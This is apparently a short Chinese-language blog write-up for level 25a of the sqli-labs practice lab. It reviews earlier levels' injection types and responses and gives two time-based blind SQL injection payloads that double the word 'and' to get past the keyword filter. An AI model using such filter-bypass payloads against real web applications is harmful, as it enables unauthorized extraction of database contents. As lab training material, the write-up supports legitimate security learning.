sqli-labs less25a

#sqli-labs less25a

基于Bool_GET过滤AND/OR数字型_盲注*

0x01. 注入方式与回显对比（Review）

GET

Less 注入方法 正确回显 错误回显

1 基于错误注入 查询到的用户名和密码 Mysql错误信息

5 双注入 固定字符串 Mysql错误信息

7 导出文件注入 固定字符串 另一固定字符串

8 Bool型盲注 固定字符串 无

9 Time型盲注 固定字符串 同一固定字符串

POST

Less 注入方法 成功回显 失败回显 错误回显

11 基于错误注入 用户名和密码 (flag.jpg) 无 (slap.jpg) Mysql错误信息 (slap.jpg)

13 双注入 无 (flag.jpg) 无 (slap.jpg) Mysql错误信息 (slap.jpg)

15 Bool/Time型盲注 无 (flag.jpg) 无 (slap.jpg) 无 (slap.jpg)

注意：GET和POST差别在于，GET只需要提交参数id，而POST则需要username与password都正确。

以上知识摘自https://www.jianshu.com/p/6430aa4ee2b6

这个题目只是一个需要绕过注入的盲注题，时间注入和布尔盲注，甚至union和报错注入都可以，不懂可以看我其他的文章

?id=1 aandnd If(ascii(substr(database(),1,1))=90,1,sleep(5))–#

aandnd if((left(database(),1)=‘s’),1,sleep(5))–+

希望大佬可以给个建议，好的我一定采纳